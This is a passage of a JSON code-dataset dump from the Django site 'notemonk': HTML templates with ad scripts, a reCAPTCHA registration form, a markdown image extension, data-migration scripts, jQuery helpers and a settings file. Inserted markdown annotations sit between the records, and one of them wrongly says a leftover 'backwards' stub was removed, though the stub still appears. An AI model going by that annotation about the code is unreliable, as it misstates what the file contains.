request.META['HTTP_COOKIE'] = cookie\n"
},
{
"alpha_fraction": 0.5039380192756653,
"alphanum_fraction": 0.5264041423797607,
"avg_line_length": 37.341583251953125,
"blob_id": "ec0fb0bd609932ebdbd586cc9004633d8bf12ac2",
"content_id": "2c2311f342a04d6d31b0022792b4ea1123a0e9da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7745,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 202,
"path": "/www/core/templates/ui/user_base.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load filters %}\n{% load tags %}\n\n{% block title %}\n\n <meta property=\"fb:app_id\" content=\"356589223428\" /> \n <meta property=\"og:type\" content=\"profile\" /> \n <meta property=\"og:url\" content=\"{{ page_user.get_profile.link }}\" /> \n <meta property=\"og:title\" content=\"{{ page_user.get_full_name }}\" /> \n <meta property=\"og:description\" content=\"Profile of {{ page_user.get_full_name }}\" /> \n <meta property=\"og:image\" content=\"{{ page_user.get_profile.image }}\" /> \n\n\n{% if page_user %}\n<div class=\"grid_11 alpha\">\n <span class=\"title\"><a href=\"{{ page_user.get_profile.link }}\">{{ page_user.get_full_name }} ({{page_user.username}})</a></span>\n (<span>{% rate page_user.get_profile %}, </span>\n <span>{% follow page_user.get_profile %}, </span>\n <span>{% flag page_user.get_profile %}</span>)\n <br/>\n {% if page_user.get_profile.location %}\n from <i>{{ page_user.get_profile.location }}</i>,\n {% endif %}\n {% if page_user.get_profile.institution %}\n affiliated to <i>{{ page_user.get_profile.institution }}</i>,\n {% endif %}\n joined {{ page_user.date_joined|dt }}\n <br/>\n</div>\n\n{% ifequal user.username page_user.username %}\n<div class=\"grid_5 omega\">\n <a href=\"/user/edit/\">\n <img src=\"/static/images/edit.png\" alt=\"edit\"/>\n </a>\n</div>\n{% endifequal %}\n{% endif %}\n\n{% endblock title %}\n\n\n{% block content %}\n\n <div class=\"grid_11 alpha\"><br/></div>\n <div class=\"grid_11 alpha\">\n {% profilepost page_user.get_profile page_user.get_profile.title 0 %}\n </div>\n <div class=\"grid_11 alpha\"><br/></div>\n\n <div class=\"grid_11 alpha\">\n {% block listing %}\n {% endblock %}\n </div>\n\n <div class=\"grid_11 alpha\"><br/></div>\n \n {% block pagination %}\n <div class=\"grid_11 alpha\">\n {% paginator stream paging_url %}\n </div>\n {% endblock %}\n\n{% endblock content %}\n\n\n{% block sidebar %}\n\n <center>\n {% if page_user.get_profile.image %}\n <img src=\"{{ page_user.get_profile.image|thumbnail:'200x200' }}\"/>\n {% else %}\n <img src=\"{{ '/static/images/user.png'|thumbnail:'200x200' }}\"/>\n {% endif %}\n </center>\n \n {% if page_user.get_profile.note.text.raw %}\n <div class=\"note\">\n {{ page_user.get_profile.note.text }}\n </div>\n <div class=\"grid_11 alpha\"><br/></div>\n {% endif %}\n\n <center class=\"emphasize\">\n <big>{{ page_user.get_profile.level_name }} ({{ page_user.get_profile.level }})</big><br/>\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.points }}</strong> of {{ page_user.get_profile.points_for_current_level }}</font> <a href=\"/user/{{page_user.get_profile.user.username}}/points/\">points</a>\n </center>\n \n {% ifequal user.username page_user.username %}\n <center class=\"\" style=\"border:1px solid;border-color:#E3E0D5;border-top:0px;border-bottom:0px\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.credits }}</strong></font> <a href=\"/redeem/\">credits</a>\n </center>\n {% endifequal %}\n\n <center class=\"activities-box\">\n <table>\n <tr>\n <td colspan=\"5\">\n <center>\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.activities.count }}</strong></font> <a title=\"Activities\" href=\"/user/{{page_user.username}}/\">Activities</a>\n </center>\n <div class=\"hrdiv\"><br/></div>\n </td>\n </tr>\n <tr>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.questions.count }}</strong></font>\n </td>\n <td>\n <a title=\"Questions asked\" 
href=\"/user/{{page_user.username}}/questions/\">Questions</a>\n </td>\n <td></td>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.answers.count }}</strong></font>\n </td>\n <td>\n <a title=\"Answers given\" href=\"/user/{{page_user.username}}/answers/\">Answers</a>\n </td>\n </tr>\n <tr>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.notes.count }}</strong></font>\n </td>\n <td>\n <a title=\"Notes written\" href=\"/user/{{page_user.username}}/notes/\">Notes</a>\n </td>\n <td></td>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.videos.count }}</strong></font>\n </td>\n <td>\n <a title=\"Videos added\" href=\"/user/{{page_user.username}}/videos/\">Videos</a>\n </td>\n </tr>\n <tr>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.books.count }}</strong></font>\n </td>\n <td>\n <a title=\"Books maintained\" href=\"/user/{{page_user.username}}/books/\">Books</a>\n </td>\n <td></td>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.following_books.count }}</strong></font>\n </td>\n <td>\n <a title=\"Following Books\" href=\"/user/{{page_user.username}}/fbooks/\">FBooks</a>\n </td>\n </tr>\n </table>\n </center>\n\n {% if page_user.get_profile.followers.all %}\n <div class=\"grid_5 alpha omega\"><br/></div>\n <div class=\"grid_5 alpha omega section-header\">Followers - {{ page_user.get_profile.followers.all.count }} <small><a href=\"{{ page_user.get_profile.followers_link }}\">see all</a></small></div>\n <div class=\"grid_5 alpha omega\">\n {% for f in page_user.get_profile.followers.all|slice:'14' %}\n {% render f.user.get_profile 'image,-text' %}\n {% endfor %}\n </div>\n {% endif %}\n\n {% if page_user.get_profile.following %}\n <div class=\"grid_5 alpha omega\"><br/></div>\n <div class=\"grid_5 alpha omega section-header\">Following - {{ page_user.get_profile.following.count }} <small><a href=\"{{ page_user.get_profile.following_link }}\">see all</a></small></div>\n <div class=\"grid_5 alpha omega\">\n {% for f in page_user.get_profile.following|slice:'14' %}\n {% render f.user.get_profile 'image,-text' %}\n {% endfor %}\n </div>\n {% endif %}\n<!--\n <div class=\"grid_5 alpha omega\">\n Place this tag where you want the badge to render\n <g:plus href=\"https://plus.google.com/103712232789698401189\" size=\"badge\"></g:plus>\n </div>\n-->\n <div class=\"grid_5 omega gad\">\n <div class=\"grid_5 alpha gid\"><br/></div>\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* 300 x 250, notemonk box listing page bottom */\n google_ad_slot = \"9649030723\";\n google_ad_width = 300;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n <!-- medium_rectangle -->\n<!-- <div id='div-gpt-ad-1319891242082-0' style='width:300px; height:250px;'>\n <script type='text/javascript'>\n googletag.cmd.push(function() { googletag.display('div-gpt-ad-1319891242082-0'); });\n </script>\n </div>\n-->\n </div>\n{% endblock sidebar %}\n"
},
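> The template above leans on project-specific tags and filters (`rate`, `follow`, `flag`, `render`, `dt`, `thumbnail`) loaded via `{% load filters %}` / `{% load tags %}`, whose implementations are not included in this dump. As a minimal sketch only, a `dt`-style humanized-datetime filter could be registered like this; the name `dt` comes from the template, while the body and the output format are assumptions:

```python
# Hypothetical sketch: the real core/templatetags code is not part of this dump.
from datetime import datetime

from django import template

register = template.Library()

@register.filter(name='dt')
def dt(value):
    """Render a datetime like '12 Mar 2011, 14:05' (assumed display format)."""
    if not isinstance(value, datetime):
        return value  # pass non-datetime values through unchanged
    return value.strftime('%d %b %Y, %H:%M')
```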
{
"alpha_fraction": 0.49794802069664,
"alphanum_fraction": 0.5512995719909668,
"avg_line_length": 22.967212677001953,
"blob_id": "335f8889feb10ba15752cb7a231183c6c42e17fb",
"content_id": "10da2b95375c3fb18e50063433329debfb21c4dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 61,
"path": "/www/core/templates/ui/redeemables.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load tags %}\n\n{% block title %}\n <div class=\"grid_11 alpha\">\n <span class=\"title\">Redeemables</a></span>\n </div>\n{% endblock title %}\n\n{% block content %}\n\n<div class=\"grid_11 alpha\"><br/></div>\n\n{% for r in redeemables.object_list %}\n\n <div class=\"grid_11 alpha\">\n {% render r 'more' %}\n </div>\n\n <div class=\"grid_11 alpha\"><br/></div>\n\n{% endfor %}\n\n<div class=\"grid_11 alpha\">\n {% paginator redeemables paging_url %}\n</div>\n\n{% endblock content %}\n\n{% block sidebar %}\n {% cart %}\n\n <div class=\"grid_5 omega\">\n <div class=\"grid_5 alpha omega\"><br/></div>\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* redeemables right first */\n google_ad_slot = \"6982616791\";\n google_ad_width = 250;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* redeemables right second */\n google_ad_slot = \"2727111707\";\n google_ad_width = 250;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.5166835188865662,
"alphanum_fraction": 0.5247725248336792,
"avg_line_length": 20.477272033691406,
"blob_id": "0d04844fe25c052fc299357e7ebe4454605fe8ab",
"content_id": "e84a2c07ad6d505bb43ee7ab6c80160ad094ee0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 989,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 44,
"path": "/www/core/templates/registration/registration_form.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\r\n\r\n{% block title %}\r\n\r\n<div class=\"grid_11 alpha\">\r\n <span class=\"title\">Become a part of the Notemonk community</span> \r\n</div>\r\n\r\n{% endblock title %}\r\n\r\n{% block content %}\r\n\r\n<!-- spacing -->\r\n<div class=\"grid_11 alpha\">\r\n <br/>\r\n</div>\r\n\r\n<div class=\"grid_11 alpha\">\r\n\r\n<div class=\"form\">\r\n <form action=\"/accounts/register/\" method=\"POST\">\r\n <table>\r\n {{ form.as_table }}\r\n </table>\r\n\r\n <div align=\"center\">\r\n <br/>\r\n <input style=\"height:30px\" type=\"submit\" value=\"Join Notemonk\"/>\r\n </div>\r\n </form>\r\n</div>\r\n\r\n</div>\r\n\r\n{% endblock content %}\r\n\r\n{% block sidebar %}\r\n <div class=\"subtitle\">Why Join?</div>\r\n <ul>\r\n <li> <strong>Rate</strong> your favorite videos\r\n <li> <strong>Store notes</strong> for quick reference\r\n <li> <strong>Experience</strong> the full depth of Notemonk\r\n </ul>\r\n{% endblock sidebar %}\r\n"
},
{
"alpha_fraction": 0.4555785059928894,
"alphanum_fraction": 0.49793389439582825,
"avg_line_length": 25.88888931274414,
"blob_id": "aa5c37c1eb34b7213c627f19c1b4600b463fb796",
"content_id": "cb1e7cebdccaff020fe7550fcb74494a4d4c259b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 968,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 36,
"path": "/www/core/templates/ui/activities.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load filters %}\n{% load tags %}\n\n{% block content %}\n {% for item in stream %}\n <div class=\"grid_11 alpha stream\">\n {% render item 'more,-flag,-addedby,context' %}\n </div>\n {% endfor %}\n\n {% if next_id != None %}\n <div class=\"grid_11 alpha slight-emphasize\">\n <center>\n <big>\n <strong>\n <a href=\"/activities/all/{{ next_id }}/\">More ...</a>\n </strong>\n </big>\n <center>\n </div>\n {% endif %}\n{% endblock content %}\n\n{% block sidebar %}\n <div class=\"grid_5 alpha\" style=\"margin-left:-10px\">\n <!-- End: adBrite -->\n <div id='div-gpt-ad-1319891242082-0' style='width:300px; height:250px;'>\n <script type='text/javascript'>\n googletag.cmd.push(function() { googletag.display('div-gpt-ad-1319891242082-0'); });\n </script>\n </div>\n </div>\n\n{% endblock sidebar %}\n"
},
{
"alpha_fraction": 0.6315217614173889,
"alphanum_fraction": 0.6315217614173889,
"avg_line_length": 27.75,
"blob_id": "fffe4e720e22f559ff3f7347d390b92049808348",
"content_id": "62f39f49f6e08664226545559b487913c3e282ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 920,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 32,
"path": "/www/core/mdx_safeimage.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import markdown\n\nclass SafeImagePattern(markdown.ImagePattern):\n def handleMatch(self, m, doc):\n img_node = markdown.ImagePattern.handleMatch(self, m, doc)\n img_node.setAttribute('class', 'inline-image')\n\n a_node = doc.createElement('a')\n a_node.setAttribute('href', img_node.attribute_values['src'])\n a_node.appendChild(img_node)\n\n return a_node\n\nclass SafeImageExtension(markdown.Extension):\n\n def extendMarkdown(self, md, md_globals):\n ps = md.inlinePatterns\n index = None\n for i, p in enumerate(ps):\n if isinstance(p, markdown.ImagePattern):\n index = i\n break\n\n if index is not None:\n ps[index] = SafeImagePattern(markdown.IMAGE_LINK_RE)\n\ndef makeExtension(configs=None):\n return SafeImageExtension(configs=configs)\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n"
},
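> The extension above registers itself under the name `safeimage` (from the `mdx_safeimage.py` filename, following the legacy python-markdown naming convention this module targets), and this repo's settings pass extension names straight to `markdown.markdown`. A minimal usage sketch, assuming a markdown version old enough to expose `markdown.ImagePattern`:

```python
# Sketch: render markdown with the safeimage extension enabled, mirroring the
# MARKITUP_FILTER configuration used elsewhere in this repo. The extension
# wraps each inline image in an <a> link and adds class="inline-image".
import markdown

html = markdown.markdown('![logo](/static/images/logo.png)',
                         extensions=['safeimage'])
print(html)
```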
{
"alpha_fraction": 0.6599518656730652,
"alphanum_fraction": 0.6599518656730652,
"avg_line_length": 35.5494499206543,
"blob_id": "31aad9740bfdce1d5b5e6108dae12d77160dcfd0",
"content_id": "e21526da0ecef98d1817f2acfc04ca82d2bda9f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3326,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 91,
"path": "/www/core/recaptcha_form.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import new\n\nfrom django import forms\nfrom django.forms import ValidationError\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import User\n\nfrom recaptcha.client import captcha\nfrom core.forms import RegistrationForm\nfrom registration.views import register as register_view\nfrom registration.backends.default import DefaultBackend as RegDefaultBackend\n\nclass RegBackend(RegDefaultBackend):\n def register(self, request, **kwargs):\n new_user = RegDefaultBackend.register(self, request, **kwargs)\n referrer = kwargs['referrer']\n if referrer:\n try:\n referrer = User.objects.get(username=referrer)\n new_user_p = new_user.get_profile()\n referrer_p = referrer.get_profile()\n\n new_user_p.referrer = referrer\n\n new_user_p.follow(referrer)\n new_user_p.save()\n\n referrer_p.follow(new_user)\n referrer_p.save()\n except ObjectDoesNotExist:\n pass\n\n return new_user\n\nclass RecaptchaMiddleware:\n def process_view(self, request, view_func, view_args, view_kwargs):\n if view_func == register_view:\n klass = new.classobj('SafeForm', (RegistrationForm, RecaptchaForm),\n {'REQUEST': request})\n\n referrer = request.GET.get('referrer', None)\n if referrer:\n klass.base_fields['referrer'].initial = referrer\n\n view_kwargs['form_class'] = klass\n view_kwargs['backend'] = 'core.recaptcha_form.RegBackend'\n\nclass RecaptchaWidget(forms.Widget):\n \"\"\" A Widget which \"renders\" the output of captcha.displayhtml \"\"\"\n def render(self, *args, **kwargs):\n return captcha.displayhtml(settings.RECAPTCHA_PUBLIC_KEY)\n\nclass DummyWidget(forms.Widget):\n \"\"\"\n A dummy Widget class for a placeholder input field which will\n be created by captcha.displayhtml\n\n \"\"\"\n # make sure that labels are not displayed either\n is_hidden=True\n def render(self, *args, **kwargs):\n return ''\n\nclass RecaptchaForm(forms.Form):\n \"\"\" \n A form class which uses reCAPTCHA for user validation.\n \n If the captcha is not guessed correctly, a ValidationError is raised\n for the appropriate field\n \"\"\"\n recaptcha_challenge_field = forms.CharField(widget=DummyWidget)\n recaptcha_response_field = forms.CharField(widget=RecaptchaWidget, label='')\n\n def clean_recaptcha_response_field(self):\n if 'recaptcha_challenge_field' in self.cleaned_data:\n self.validate_captcha()\n return self.cleaned_data['recaptcha_response_field']\n\n def clean_recaptcha_challenge_field(self):\n if 'recaptcha_response_field' in self.cleaned_data:\n self.validate_captcha()\n return self.cleaned_data['recaptcha_challenge_field']\n\n def validate_captcha(self):\n rcf = self.cleaned_data['recaptcha_challenge_field']\n rrf = self.cleaned_data['recaptcha_response_field']\n ip_address = self.REQUEST.META['REMOTE_ADDR']\n check = captcha.submit(rcf, rrf, settings.RECAPTCHA_PRIVATE_KEY, ip_address)\n if not check.is_valid:\n raise ValidationError('You have not entered the correct words')\n"
},
{
"alpha_fraction": 0.5235229730606079,
"alphanum_fraction": 0.5574398040771484,
"avg_line_length": 28.015872955322266,
"blob_id": "31f5f41cfa4f529f9b5eec9b5b82206ec945ca4f",
"content_id": "35dc246008373155463e96d823eadf854a15194e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1828,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 63,
"path": "/www/core/templates/ui/video.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load tags %}\n{% load filters %}\n\n{% block title %}\n<div class=\"grid_11 alpha\">\n <span class=\"title\">{{ avideo.media.title }}</span>\n (\n <span>{% rate avideo %}, </span>\n <span>{% flag avideo %}</span>)\n <div>\n <span>under <a href=\"{{ avideo.target.link }}\">{{ avideo.target.title|truncatewords:5 }}</a></span>\n <span>by {% render avideo.user.get_profile %}</span>,\n added <span>{{avideo.date_added|dt}}</span>\n </div>\n</div>\n{% endblock title %}\n\n{% block content %}\n\n<div class=\"grid_11 alpha\"><br/></div>\n\n<div class=\"grid_11 alpha\">\n <center>\n <object width=\"425\" height=\"344\">\n <param name=\"movie\" value=\"http://www.youtube.com/v/{{avideo.media.source_id}}&hl=en_US&fs=1&\"></param>\n <param name=\"allowFullScreen\" value=\"true\"></param>\n <param name=\"allowscriptaccess\" value=\"always\"></param>\n <embed src=\"http://www.youtube.com/v/{{avideo.media.source_id}}&hl=en_US&fs=1&\"\n type=\"application/x-shockwave-flash\"\n allowscriptaccess=\"always\" allowfullscreen=\"true\"\n width=\"425\" height=\"344\">\n </embed>\n </object>\n </center>\n</div>\n\n{% note avideo %}\n\n<br/><br/>\n{% question avideo avideo.title 5 %}\n\n{% endblock content %}\n\n{% block sidebar %}\n <div class=\"grid_5 omega gad\">\n\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* 300 x 250, notemonk box listing page bottom */\n google_ad_slot = \"9649030723\";\n google_ad_width = 300;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n </div>\n\n{% endblock %}\n"
},
{
"alpha_fraction": 0.5287958383560181,
"alphanum_fraction": 0.5375218391418457,
"avg_line_length": 23.913043975830078,
"blob_id": "37be41677919e843241a255294845f140787f20f",
"content_id": "d3d907fa148f3e3d904fcd3b1d50a86d4f04a44c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 23,
"path": "/www/core/templates/renderables/comment_group.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"renderables/group_base.html\" %}\n\n{% load tags %}\n{% load filters %}\n\n{% block digest %}\n <div class=\"grid_1 alpha\">\n {% render target.user.get_profile 'image,-text,more' %}\n </div>\n\n <div class=\"grid_9 omega\" style=\"padding:0px 10px;\">\n {% if target|cname == 'ProfilePost' %}\n {% render target 'more,comment' %}\n {% else %}\n {% render target 'more' %}\n {% comment target 'image,commentbox' %}\n {% endif %}\n </div>\n \n{% endblock digest %}\n\n{% block activities %}\n{% endblock activities %}\n"
},
{
"alpha_fraction": 0.6257695555686951,
"alphanum_fraction": 0.6266490817070007,
"avg_line_length": 30.150684356689453,
"blob_id": "c16d7051f5fae5df6caf8d72224612cc73c36318",
"content_id": "b1c1bbf52ec6e6020f376340c818f2d50a24786d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2274,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 73,
"path": "/www/scripts/v2migrate.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nimport os\nimport datetime\nimport hashlib\nfrom core.utils import QuerySetMerge, QuerySetFilter\nfrom django.core.files.base import ContentFile\nfrom django.contrib.contenttypes.models import ContentType\nfrom core.models import *\n\n\ndef main():\n\n # Ensure Markup rendered field is filled in\n # By force saving all models\n for k in (Question, Answer, Note):\n for o in k.objects.all():\n o.save()\n\n # Prepopulate activities into Activity table\n qsets = []\n for k in (PointsHistory, Book, Note, Question, Answer,\n Ratings, Follows, Flags, Redemption, Attachment,\n Comment, ProfilePost):\n qsets.append(k.objects.all().order_by('-date_added'))\n\n qsets.append(QuerySetFilter(AssociatedMedia.objects.all().order_by('date_added'),\n fn=lambda x: (x if isinstance(x.media, Video) else None)))\n qset = QuerySetMerge(qsets, 'date_added')\n\n for o in qset:\n a = Activity.add(o.user, o)\n if a is None: continue\n a.date_added = o.date_added\n a.save()\n\n # Convert Q&A in user pages into ProfilePosts and Comments\n\n uprofile_ctype = ContentType.objects.get_for_model(UserProfile)\n\n questions = Question.objects.filter(target_type=uprofile_ctype.id).order_by('-date_added')\n for q in questions:\n pp = ProfilePost.objects.create(user=q.user, profile=q.target,\n text=q.text.raw)\n pp.date_added = q.date_added\n pp.save()\n\n answers = q.answer_set.all().order_by('-date_added')\n for a in answers:\n Comment.objects.create(user=a.user, text=a.text.raw,\n target_type=pp.ctype, target_id=pp.id)\n\n\n # Make book download into attachment\n for b in Book.objects.all().order_by('-date_added'):\n if not b.file: continue\n if not os.path.exists(b.file.path): continue\n c = open(b.file.path, 'rb').read()\n checksum = hashlib.md5(c).hexdigest()\n c = ContentFile(c)\n\n u = UploadedFile(checksum=checksum, uploader=b.user)\n u.file.save(b.file.name, c, save=True)\n u.save()\n\n a = b.attach(b.user, ufile=u, title='FULL NCERT BOOK - ZIP')\n\n\n def backwards(self, orm):\n pass\n\n\nif __name__ == '__main__':\n main()\n"
},
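> Note: the stray `def backwards(self, orm)` stub at the end of the original file was a leftover South-migration method signature nested inside `main()` and has been dropped. `QuerySetMerge` and `QuerySetFilter` come from `core.utils`, which is not part of this dump; from the call site, `QuerySetMerge(qsets, 'date_added')` merges several querysets that are each already ordered by `date_added`. A minimal stand-in sketch of that merge idea on plain iterables (names and behavior assumed):

```python
# Hypothetical stand-in for core.utils.QuerySetMerge: lazily merge iterables
# that are each pre-sorted in descending order by the given attribute.
import heapq
from operator import attrgetter

def merge_by_attr_desc(iterables, attr):
    # heapq.merge streams its inputs without materializing them;
    # key= and reverse= are supported on Python 3.5+.
    return heapq.merge(*iterables, key=attrgetter(attr), reverse=True)
```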
{
"alpha_fraction": 0.5045672059059143,
"alphanum_fraction": 0.5102218389511108,
"avg_line_length": 25.413793563842773,
"blob_id": "e3ce2601242315d7a18381140afbb653a3a91d9b",
"content_id": "1e86b0dcd91bf9062046ee16100ec82941e908a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2299,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 87,
"path": "/www/static/js/main.js",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "\nfunction setup_showhide(show_button, hide_button, content)\n{\n $(content).hide();\n\n $(show_button).click(function(){\n $(show_button).fadeOut(\"fast\");\n $(content).slideDown(\"slow\");\n return false;\n });\n $(hide_button).click(function(){\n $(show_button).fadeIn(\"slow\");\n $(content).slideUp(\"fast\");\n return false;\n });\n}\n\nfunction init_default_text()\n{\n $(\".default_text\").focus(function(srcc)\n {\n if ($(this).val() == $(this)[0].title)\n {\n $(this).removeClass(\"default_text_active\");\n $(this).val(\"\");\n }\n });\n \n $(\".default_text\").blur(function()\n {\n if ($(this).val() == \"\")\n {\n $(this).addClass(\"default_text_active\");\n $(this).val($(this)[0].title);\n }\n });\n \n $(\".default_text\").blur();\n}\n\nfunction initialize()\n{\n init_default_text();\n\n $('img.captify').captify({\n // all of these options are... optional\n // ---\n // speed of the mouseover effect\n speedOver: 'fast',\n // speed of the mouseout effect\n speedOut: 'normal',\n // how long to delay the hiding of the caption after mouseout (ms)\n hideDelay: 500, \n // 'fade', 'slide', 'always-on'\n animation: 'slide', \n // text/html to be placed at the beginning of every caption\n prefix: '', \n // opacity of the caption on mouse over\n opacity: '0.7', \n // the name of the CSS class to apply to the caption box\n className: 'caption-bottom', \n // position of the caption (top or bottom)\n position: 'bottom',\n // caption span % of the image\n spanWidth: '100%'\n });\n\n setup_showhide('#add_image', '#hide_images_add', '#images_add_form')\n setup_showhide('#add_video', '#hide_videos_add', '#videos_add_form')\n \n $('.elastic').elastic();\n}\n\nfunction expandtextarea(button, post_form, textbox, user_anonymous,\n ref_path)\n{\n if ('True' == user_anonymous)\n {\n window.location=\"/login/?next=\"+ref_path\n }\n else\n {\n window.setTimeout(function(){\n $(button).hide();\n $(post_form).show();\n $(textbox).focus();}, 100);\n }\n}\n"
},
{
"alpha_fraction": 0.6077630519866943,
"alphanum_fraction": 0.6087844967842102,
"avg_line_length": 26.97142791748047,
"blob_id": "50ae525b5b9348f8d66be04409d5588531d0de91",
"content_id": "3c128b6b5ea246c496a880df15ebd8543a1e309a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 35,
"path": "/www/scripts/v3migrate.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n'''\nActivity system revamp. Need to populate stream per user and book.\n'''\nfrom django.contrib.contenttypes.models import ContentType\nfrom core.models import *\n\n\ndef main():\n \n # Create Stream per user and book\n for u in UserProfile.objects.all():\n if u.stream is None:\n u.stream = Stream.objects.create(title='for user: %s' % u.user.username)\n u.save()\n\n for b in Book.objects.all():\n if b.stream is None:\n b.stream = Stream.objects.create(title='for book: %s' % b.title)\n b.save()\n\n # create stream entries for profile posts\n ppost_type = ContentType.objects.get_for_model(ProfilePost)\n for a in Activity.objects.filter(target_type=ppost_type).order_by('date_added'):\n p = a.target\n\n if p.profile.user == p.user:\n continue\n\n si = p.profile.stream.add(a)\n si.date_added = a.date_added\n si.save()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.650877833366394,
"alphanum_fraction": 0.6706727743148804,
"avg_line_length": 31.545454025268555,
"blob_id": "07b06ffd8f632c010ac52ecb94a7c845195c398a",
"content_id": "3442e5cfcaa7a5b87e94161a7a2847fc1921a070",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8487,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 253,
"path": "/www/settings.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os\r\nimport logging\r\n\r\ndef create_logger(filename, log_level=logging.NOTSET, stderr=False):\r\n '''\r\n Make a logger that writes to I{filename}.\r\n\r\n @type filename: str\r\n @param filename: filename of file to which log has to be written\r\n\r\n @type log_level: logging.<log level>\r\n @param log_level: logging.[DEBUG, INFO, EXCEPTION, WARNING]\r\n\r\n @return: log object\r\n '''\r\n\r\n logger = logging.getLogger()\r\n handler = logging.FileHandler(filename)\r\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\r\n\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n\r\n if stderr:\r\n handler = logging.StreamHandler(sys.stderr)\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n\r\n logger.setLevel(log_level)\r\n\r\n return logger\r\n\r\n\r\nLOG_FNAME = 'notemonk.log'\r\ncreate_logger(LOG_FNAME, logging.DEBUG)\r\n\r\nTEMPLATE_DEBUG = DEBUG = True #False\r\n\r\nPROJNAME = os.path.basename(os.path.dirname(__file__))\r\n\r\nADMINS = (\r\n ('Notemonk', '[email protected]'),\r\n)\r\n\r\nMANAGERS = ADMINS\r\n\r\n#DATABASE_ENGINE = 'sqlite3' # or 'oracle', 'postgresql_psycopg2', 'postgresql', 'mysql',\r\n#DATABASE_NAME = 'sitebase.db' # Or path to database file if using sqlite3.\r\n#DATABASE_USER = '' # Not used with sqlite3.\r\n#DATABASE_PASSWORD = '' # Not used with sqlite3.\r\n#DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\r\n#DATABASE_PORT = '' # Set to empty string for default. Not used with 